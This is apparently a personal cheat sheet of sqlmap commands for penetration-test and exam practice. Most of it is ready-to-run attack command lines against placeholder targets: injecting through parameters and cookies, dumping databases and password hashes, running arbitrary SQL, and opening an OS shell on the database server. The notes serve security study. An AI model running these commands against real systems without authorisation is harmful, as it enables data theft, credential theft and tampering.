SQLmap

Assess and exploit SQL injection vulnerability. Made in Python. Ref: http://www.binarytides.com/sqlmap-hacking-tutorial

NOT ALLOWED DURING THE OSCP EXAM

Upgrade SQLmap
Help
Troubleshooting
Specify injection points
HTTP POST/PUT
HTTP GET
Websockets

Upgrade SQLmap

apt install --only-upgrade sqlmap

Help

sqlmap -h
sqlmap -hh
--technique="BEUSTQ"
B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries
--dbms=
mssql for Microsoft SQL Server
mysql for MySQL
oracle for Oracle
pgsql for PostgreSQL
sqlite for SQLite
access for Microsoft Access
firebird for Firebird
sybase for Sybase
maxdb for MaxDB
db2 for IBM DB2
hsql for HSQLDB
informix for Informix
teradata for Teradata

For penetration test when customer data extraction is not allowed, use –banner.

Specify injection points

You can use asterisks * to specify your injection point.

sqlmap -u "http://www.example.com/index.php?id=1" --data="POST_STRING_HERE*" --dbs

For urls that are not in the form of “param=value”, SQLmap cannot automatically know where to inject. In such cases SQLmap needs to be told the injection point marked by a “*”. For example:

URL="http://x.x.x.x/class_name/method/43*/80"

In JSON from request file:

POST /someapi
...

{"name":"joe", email":"*"}

Troubleshooting

sqlmap -v 6 ...
sqlmap --proxy http://127.0.0.1:8080 ...

HTTP POST/PUT

For HTTPS, add option “–force-ssl”

  • –data : POST request, parameters with values
  • -p : parameters that SQLmap will try to inject. CAN BE A COOKIE NAME.
URL="http://x.x.x.x/login.php"
COOKIES="cookie1=value1; cookie2=value2"

sqlmap -u $URL --data="username=admin&password=foo&login=submit" -p username,password --dbms=mysql --cookie="$COOKIES" --level=5 --risk=3
sqlmap --method=PUT ...

HTTP GET

For HTTPS, add option “–force-ssl”

  • -p : parameters that SQLmap will try to inject. CAN BE A COOKIE NAME.
URL="http://x.x.x.x/?cat=1"
COOKIES="cookie1=value1; cookie2=value2"

# --passwords: Enumerate DBMS users password hashes
sqlmap -u $URL --dbms=MySQL --cookie="$COOKIES" -p cat --level=5 --risk=3 --passwords
URL="http://x.x.x.x/?param1=1&param2=2"
sqlmap -u $URL --ignore-proxy --force-ssl -H "Header1: value1" -p param1,param2 --level=5 --risk=3 --banner
# Test for SQL injection
URL="http://x.x.x.x/admin"
sqlmap -u $URL --crawl=1

Inject in cookies

sqlmap -u $URL --dbms=MySQL --cookie="cookie1=*" -p cookie1 --users --passwords

Do not use results from previous sessions

sqlmap --flush-session ...

Using a request file

Copy/Paste a request from Burp Suite into a file.

FILE=~/Documents/burp_request.txt

# List all databases
sqlmap -r $FILE --dbs

Logs

Output (screen output and data in .csv) will be generated at

/home/kali/.local/share/sqlmap/output/<target URL>

Other examples

#-------------------------------------------------------------------------------
# VARIABLES
#-------------------------------------------------------------------------------
DIR="/root/Documents"
URL="http://x.x.x.x/admin"
DB="owasp10"
TABLE="users"
QUERY="SELECT * from ..."


#-------------------------------------------------------------------------------
# *** TO COMPLETE
#-------------------------------------------------------------------------------
URL=" http://x.x.x.x/owaspbricks/login-1/index.php"
sqlmap -u $URL --dbms=MySQL --level=5 --risk=3 --passwords

#-------------------------------------------------------------------------------
# Check the input parameters to find if they are vulnerable to sql injection or not
#-------------------------------------------------------------------------------
# Need to have at least one parameter in the URL? 

URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL

#-------------------------------------------------------------------------------
# List all databases
#-------------------------------------------------------------------------------
sqlmap -u $URL --dbs
sqlmap -r $FILE --dbs

#-------------------------------------------------------------------------------
# Find tables in a particular database
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"

sqlmap -u $URL --tables -D $DB
sqlmap -r $FILE --tables -D $DB

#-------------------------------------------------------------------------------
# Get columns of a table
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --columns -D $DB -T $TABLE

#-------------------------------------------------------------------------------
# Get data from a table, display the content.
# sqlmap will create a csv file containing the dump data for easy analysis.
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"

sqlmap -u $URL --dump -D $DB -T $TABLE
sqlmap -r $FILE --dump -D $DB -T $TABLE

#-------------------------------------------------------------------------------
# Dump the database
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --dbms=mysql --dump --threads=7

sqlmap -r request.txt --data=muser,mpass --dbms=mysql --dump
request.txt: contains request copy/pasted from Burp

#-------------------------------------------------------------------------------
# Execute arbitrary sql queries
#-------------------------------------------------------------------------------
# Things of interest would be to create a user in the users table or something similar.
# Or maybe change/modify the content of CMS pages etc.

URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --sql-query $QUERY

#-------------------------------------------------------------------------------
# Execute arbitrary sql queries with a SQL shell. Gives an sql shell like interface to run queries interactively.
#-------------------------------------------------------------------------------
URL="http://x.x.x.x/section.php?id=51"
sqlmap -u $URL --sql-shell

#-------------------------------------------------------------------------------
# Try to get a shell on remote system, but it has many limitations of its own. 
#-------------------------------------------------------------------------------
# It is possible to run arbitrary commands on the database server's underlying operating 
# system when the back-end database management system is either MySQL, PostgreSQL or 
# Microsoft SQL Server, and the session user has the needed privileges to abuse database
# specific functionalities and architectural weaknesses.

--os-shell

#-------------------------------------------------------------------------------
# Sometimes sqlmap is unable to connect to the url at all. This is visible when it gets stuck at the first task of "testing connection to the target url". Use the option to make sqlmap use a valid user agent signature like the ones send by a browser like chrome or firefox.
#-------------------------------------------------------------------------------

--random-agent



#-------------------------------------------------------------------------------
# When using forms that submit data through post method then sqlmap has to be provided the post data.
#-------------------------------------------------------------------------------
--data

Websockets

This does not return any errors but does not work. See this post.

sqlmap -u "ws://example.com:1234/?id=123" -p "id" --dbs

See Hack the Box (HTB) – Soccer.

Start an HTTP Proxy with sqlmap-websocket-proxy

HTTP Proxy for using sqlmap against websockets, see Official Documentation.

sudo pip3 install sqlmap-websocket-proxy
sqlmap-websocket-proxy
usage: sqlmap-websocket-proxy [-h] -u URL -p PAYLOAD [-o PORT] [--json]
sqlmap-websocket-proxy -u example.com:1234 -p '{"id":"%param%"}' --json

Run SQLmap as usual but proxied via localhost:8080.

sqlmap -u "http://localhost:8080/?id=1" -p id --dbms=mysql